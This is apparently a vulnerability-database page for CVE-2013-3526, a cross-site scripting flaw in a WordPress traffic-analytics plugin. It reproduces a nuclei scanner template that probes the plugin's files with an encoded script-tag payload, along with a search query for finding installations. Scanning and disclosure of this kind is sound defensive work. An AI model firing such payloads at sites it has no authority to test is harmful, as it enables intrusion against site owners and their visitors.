Lucene search
K

WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

A cross-site scripting vulnerability in WordPress Plugin Traffic Analyzer allows remote attackers to inject arbitrary web script or HTML via the 'aoid' parameter. Upgrading to the latest version is recommended to mitigate this vulnerability

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2013-3526
9 Apr 201300:00
circl
CVE
CVE-2013-3526
10 May 201321:00
cve
Cvelist
CVE-2013-3526
10 May 201321:00
cvelist
EUVD
EUVD-2013-3461
7 Oct 202500:30
euvd
NVD
CVE-2013-3526
10 May 201321:55
nvd
OpenVAS
WordPress Traffic Analyzer Plugin XSS Vulnerability
12 Apr 201300:00
openvas
Patchstack
WordPress Traffic Analyzer Plugin - Cross Site Scripting
9 Apr 201300:00
patchstack
Prion
Cross site scripting
10 May 201321:55
prion
Tenable Nessus
Traffic Analyzer Plugin for WordPress 'ta_loaded.js.php' 'aoid' Parameter XSS
22 Apr 201300:00
nessus
WPVulnDB
Traffic Analyzer 3.3.2 - js/ta_loaded.js.php aoid Parameter XSS
1 Aug 201410:59
wpvulndb
Rows per page
id: CVE-2013-3526

info:
  name: WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter."
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2013-3526
    - http://packetstormsecurity.com/files/121167/WordPress-Traffic-Analyzer-Cross-Site-Scripting.html
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/83311
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/d4n-sec/d4n-sec.github.io
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2013-3526
    cwe-id: CWE-79
    epss-score: 0.08185
    epss-percentile: 0.92335
    cpe: cpe:2.3:a:wptrafficanalyzer:trafficanalyzer:1.0.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: wptrafficanalyzer
    product: trafficanalyzer
    google-query: "inurl:\"/wp-content/plugins/trafficanalyzer\""
  tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/trafficanalyzer/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'traffic analy'
          - 'Tags:'
        condition: and

  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ea29e570343a6a4c543606d18145dcf3891bc3482296dee36273cd69689a39470220288e522032b38df4f9867ee6ac5101be7bd50fbf7494fe7f1324006410d80045:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.08185
19